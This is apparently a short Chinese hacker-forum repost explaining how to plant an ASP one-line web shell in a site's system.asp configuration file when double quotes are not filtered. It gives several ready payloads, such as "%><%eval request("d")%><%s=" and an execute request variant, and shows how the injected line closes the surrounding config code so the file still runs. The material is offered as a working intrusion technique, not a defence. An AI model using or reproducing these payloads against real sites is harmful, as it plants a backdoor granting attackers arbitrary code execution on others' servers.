一句话插配置文件

2011, January 17, 12:39 AM. 黑友网文
Submitted by admin

http://www.t00ls.net/viewthread.php?tid=13901

一句话插入配置文件system.asp

没有过滤双引号,插入一句就行。

常规插法如下:

"%><%eval request("d")%><%

但金刀客这篇文件(http://www.cqzh.cn/post/328.html)为什么说

"%><%eval request("d")%><%s="

必须要加s=呢?

比如:

web_name="中国纺织网"

插入后:

web_name="中国纺织网"%><%eval request("d")%><%"

跟这样不就全闭合了吗?

还需要<%s="干嘛?直接<%闭合下面的不就行了。

 

=========

":eval request(9)      //这多简单

=================

<%
webname="abc"
webhost="d:\abc\abc\www"
%>

插入"%><%eval request("d")%><%s="后就变成
<%
webname="abc"%><%eval request("d")%><%s=""
webhost="d:\abc\abc\www"
%>

 

============

test"%><%execute request("value")%><%a="test

Tags: 一句话

« 上一篇 | 下一篇 »

只显示10条记录相关文章
eval一句话木马原理详解 (浏览: 7890, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):